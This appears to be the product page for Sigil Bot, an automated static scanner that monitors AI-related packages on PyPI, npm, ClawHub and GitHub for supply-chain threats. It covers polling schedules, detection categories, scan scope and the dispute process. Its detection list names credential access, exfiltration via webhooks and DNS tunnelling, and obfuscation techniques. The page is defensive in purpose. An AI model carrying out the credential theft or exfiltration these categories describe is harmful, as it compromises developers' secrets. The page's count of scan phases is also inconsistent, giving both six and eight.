Automated Scanner
Sigil Bot
Sigil Bot continuously monitors package registries for security threats targeting the AI development ecosystem. Scan results are published automatically at sigilsec.ai/scans.
How Sigil Bot Works
Sigil Bot monitors four package registries for newly published and updated packages:
Python packages via RSS feeds and changelog API
JavaScript packages via CouchDB changes feed
AI agent skills via REST API
MCP server repositories via Search and Events API
When a new package or update is detected, the bot downloads the source code, runs a static analysis scan across six security phases, and publishes the results to the public scan database.
No code is executed during scanning. Sigil performs static analysis only — pattern matching against known threat indicators. Packages are never installed or run.
Scanning Schedule
| Registry | Poll Frequency |
|---|---|
| PyPI | Every 60 seconds |
| npm | Every 60 seconds |
| ClawHub | Every 6 hours |
| GitHub | Every 30 minutes |
Frequencies may be adjusted based on registry rate limits and operational needs.
Detection Methodology
Sigil scans eight security phases with weighted severity scoring. Each finding has a severity weight. The total weighted score determines the overall verdict.
Install Hooks
setup.py cmdclass, npm postinstall scripts, Makefile targets
Code Patterns
eval, exec, pickle, child_process, dynamic code execution
Network / Exfiltration
Outbound HTTP calls, webhooks, DNS tunnelling, socket connections
Credential Access
Environment variable reads, API key patterns, SSH key access
Obfuscation
Base64 encoding, character code arrays, hex-encoded payloads
Provenance
Git history anomalies, binary files, hidden directories, name similarity to popular packages
Full methodology details available on the Methodology page.
Which Packages Are Scanned
ClawHub
All skills are scanned. The entire registry is in scope because every skill has direct access to the user's environment.
PyPI & npm
Packages are filtered by AI ecosystem relevance — matching against keywords like langchain, openai, anthropic, mcp, agent, llm, rag, transformers, and more. Scoped npm packages under @modelcontextprotocol, @langchain, @anthropic, @openai are always scanned.
GitHub
Repositories matching MCP server patterns (topic tags, config files, import patterns) with at least one star or more than one commit.
Packages with names closely resembling popular AI packages (potential typosquatting) are automatically prioritised for immediate scanning.
About Sigil Bot
Sigil Bot operates under the sigil-bot identity:
All output is automated. Scan results are systematic, algorithmic assessments — not editorial judgments by individuals. Results indicate the presence of patterns associated with known threat categories, not definitive classifications of malicious intent.
Dispute a Scan Result
If you believe a scan result is inaccurate or your package has been incorrectly flagged:
Review the report
Check the full scan report to understand which findings were detected and why.
Submit a dispute
Email disputes@sigilsec.ai with the package name, ecosystem, version, and which findings you believe are incorrect.
Provide context
Explain the legitimate purpose of the flagged pattern. This helps us refine detection rules.
Resolution
We review within 5 business days. False positives are suppressed, broad rules are refined, accurate findings remain with an explanation.
Disputes do not remove scan results from the database. Resolved disputes add a “Reviewed” annotation to the report page. Contact disputes@sigilsec.ai.
FAQ
- Does Sigil Bot scan every package on npm and PyPI?
- No. Sigil Bot filters for AI-related packages using keyword matching against package names, descriptions, and classifiers. All ClawHub skills and GitHub MCP server repositories are scanned without filtering.
- How often are packages rescanned?
- New versions are scanned immediately when detected. Packages with HIGH RISK or CRITICAL RISK verdicts are rescanned weekly. Popular packages with over 10,000 weekly downloads are rescanned monthly.
- Can I request a scan of a specific package?
- Not yet — this feature is on the roadmap. Currently, Sigil Bot discovers and scans packages automatically through registry monitoring feeds.
- How do I dispute a scan result?
- Email disputes@sigilsec.ai with the package name, ecosystem, version, and which specific findings you are contesting. Sigil acknowledges disputes within 48 hours and resolves most within 5 business days.
Legal Notice
Sigil Bot scans publicly available source code distributed through public package registries. Publishing a package to PyPI, npm, ClawHub, or a public GitHub repository constitutes distribution of source code to the public.
Scan results are automated assessments based on pattern matching — they represent algorithmic analysis, not claims of wrongdoing. Results do not constitute legal advice or security certification.
For full terms, see sigilsec.ai/terms.
